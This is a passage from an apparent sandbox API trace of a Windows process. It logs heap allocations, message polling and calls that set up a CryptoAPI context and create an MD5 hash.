lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0259.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0259.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0259.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0259.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0259.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0259.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0259.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0259.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0259.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0259.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0259.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0259.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0259.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0259.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0259.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.199] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0259.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0259.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0259.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0259.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e698c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0259.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0259.200] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0259.201] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.201] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.201] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0259.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0259.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.201] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.201] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0259.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0259.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0259.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0259.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0259.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.202] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0259.202] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0259.202] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.202] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0259.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0259.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0259.202] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.202] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0259.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.202] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.202] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.202] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.203] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.203] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0259.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0259.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.203] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.203] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.203] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.203] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.203] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.203] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.204] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0259.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0259.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.204] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.204] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0259.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.204] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0259.204] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0259.204] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.204] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0259.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0259.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.204] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.204] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0259.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.204] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.205] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.205] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.205] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0259.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.205] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.205] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0259.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0259.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.205] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.205] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0259.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51e98, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0259.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.206] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0259.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0259.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0259.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0259.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0259.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0259.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0259.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0259.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0259.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0259.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0259.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0259.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0259.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0259.206] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0259.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0259.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0259.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0259.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0259.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0259.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0259.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0259.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0259.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0259.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0259.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0259.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0259.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0259.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0259.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0259.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0259.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0259.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0259.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0259.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0259.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0259.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0259.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0259.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0259.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0259.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0259.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0259.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0259.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0259.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0259.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0259.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0259.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0259.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0259.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0259.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0259.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0259.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0259.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0259.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0259.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0259.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0259.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0259.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0259.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0259.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0259.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0259.209] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0259.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0259.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0259.209] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.209] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0259.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0259.209] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0259.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0259.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0259.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0259.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0259.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) 